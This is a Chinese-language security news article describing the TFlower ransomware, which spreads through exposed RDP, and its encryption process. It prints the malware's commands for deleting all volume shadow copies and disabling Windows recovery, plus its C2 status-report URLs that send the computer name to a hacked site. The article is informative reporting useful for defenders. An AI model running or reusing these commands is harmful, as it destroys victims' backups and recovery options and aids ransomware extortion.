目標鎖定企業環境的最新勒索軟件被命名為“TFlower”，正通過未得到安全保護的遠程桌面服務（RDP）傳播。也就是說，它是在攻擊者通過RDP服務侵入受害者電腦後手動安裝的。

據外媒BleepingComputer報道，這種新型勒索軟件實際上是由白帽黑客GrujaRS在上個月初發現的，但直到最近才開始大規模爆發，一些企業和政府機構已經遭到感染。

通過RDP獲取電腦訪問權限

如上所述，TFlower在攻擊者通過未得到安全保護的RDP服務侵入受害者電腦後手動安裝的。

一旦攻擊者獲取到了對目標電腦的訪問權限，他們就會在本地安裝TFlower，甚至可能會通過PowerShell Empire、PSExec等工具來遍歷網絡。

TFlower勒索軟件的加密流程

在執行時，TFlower將顯示一個控制檯窗口，高調地展示它的加密過程。

圖1.TFlower控制檯窗口

然後，它將與命令和控制（C2）服務器建立通信，以便進行狀態檢查。在BleepingComputer看到的一個樣本中，C2服務器是一個被黑掉的Wordpress網站，並使用瞭如下地址：

https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=start

接下來，它將嘗試刪除卷影副本，並執行禁用Windows 10修復環境的命令。

vssadmin.exe delete shadows /all /quiet
bcdedit.exe /set {default} recoveryenabled no
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {current} recoveryenabled no
bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures

此外，它還會查找並殺死Outlook.exe進程，以便允許打開其數據文件打開進行加密。

圖2.殺死Outlook.exe進程

緊接著，它將繼續加密受感染電腦上的文件（會跳過Windows或Sample Music文件夾）。

加密文件時，它不會添加額外擴展名，但會添加“* tflower”標記以及該文件的加密密鑰（經過加密處理），如下所示。

圖3.經TFlower加密後的文件

加密完成後，它將以如下形式向C2服務器發送另一個狀態更新：

https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=success%20[encrypted_file_count],%20retry%20[retried_file_count]

最後，一個名為“!_Notice_!.txt”的贖金票據就會出現在受感染電腦的桌面上。

圖4.TFlower勒索軟件的贖金票據

到目前為止，針對TFlower勒索軟件的研究仍在進行當中，因此尚沒有可以用來免費恢復被其加密文件的方法。